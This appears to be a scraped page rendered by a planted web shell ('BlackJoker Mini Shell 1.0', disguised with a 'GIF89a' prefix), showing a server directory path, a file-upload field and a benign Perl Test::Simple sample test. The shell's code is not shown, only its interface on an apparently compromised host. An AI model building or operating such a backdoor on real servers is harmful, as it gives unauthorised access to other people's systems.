GIF89a; Mini Shell

Mini Shell

Direktori : /proc/self/root/usr/share/doc/perl-Test-Simple-0.98/t/lib/Test/Simple/sample_tests/
Upload File :
Current File : //proc/self/root/usr/share/doc/perl-Test-Simple-0.98/t/lib/Test/Simple/sample_tests/death.plx

require Test::Simple;

push @INC, 't/lib';
require Test::Simple::Catch;
my($out, $err) = Test::Simple::Catch::caught();

require Dev::Null;

Test::Simple->import(tests => 5);
tie *STDERR, 'Dev::Null';

ok(1);
ok(1);
ok(1);
$! = 0;
die "This is a test";

./BlackJoker Mini Shell 1.0